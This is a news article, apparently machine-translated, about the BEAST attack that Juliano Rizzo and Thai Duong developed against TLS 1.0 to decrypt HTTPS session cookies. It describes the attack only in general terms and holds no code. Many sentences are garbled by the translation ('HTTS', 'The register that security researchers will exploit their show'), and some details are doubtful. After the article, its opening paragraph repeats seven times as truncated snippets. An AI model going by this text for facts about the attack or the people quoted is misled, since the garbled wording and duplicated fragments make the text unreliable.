The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”.

The gap lies, according to Rizzo and Duong in version 1.0 of secure Transport Layer Security (TLS), the encryption mechanism, the sites are accessed via HTTS. TLS is the successor to Secure Sockets Layer (SSL). It is mainly used by banks websites and companies – such as Google, Facebook and Twitter.

Rizzo and Duong will present their exploits on Friday at the Hackers Conference Ekoparty in Argentina. “We also describe an application of the attack to obtain authentication tokens and cookies to HTTPS requests and decode efficiently,” Rizzo wrote. “We exploit uses a vulnerability that currently exists in the SSL / TLS implementation of large web browser.”

According to information from Threatpost BEAST works by allowing the victim to bring a browser to run JavaScript code that works with a sniffer that monitors network communications of the user. This is also indirectly via a iframe ad. With the method can tap a authentication cookie – a small text file that a Web server can communicate with others, that a user is authorized to login.

The register that security researchers will exploit their show, decoding order a cookie for access to PayPal’s payment page is responsible. According to Rizzo at the moment it takes about ten minutes, carried out the attack.

Nevertheless, Adam Langley, TLS expert on Google, do not worry. “The security researchers have BEAST browser vendors made available, so I do not speak in detail about it until the code is public. He is very neat, but not something you need to worry,” Langley wrote in a Twitter message.

Security researcher Karsten Nohl, of the University of Virginia, said the exploit combine two areas of security work. “Cryptanalysis and client-side attacks, in which case a well-known client-side problem – namely, that Web sites do not differ be screened – used to an assumption of cryptography to countered: that of a user’s computer will not attack him. “

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]

The security researchers Juliano Rizzo and Thai Duong have developed an exploit that exploits a vulnerability in a widely used technique for encrypting web pages. They call their code BEAST, which, according to Kaspersky’s blog post threat stands for “Browser Exploit Against SSL / TLS”. The gap lies, according to Rizzo and Duong in version [...]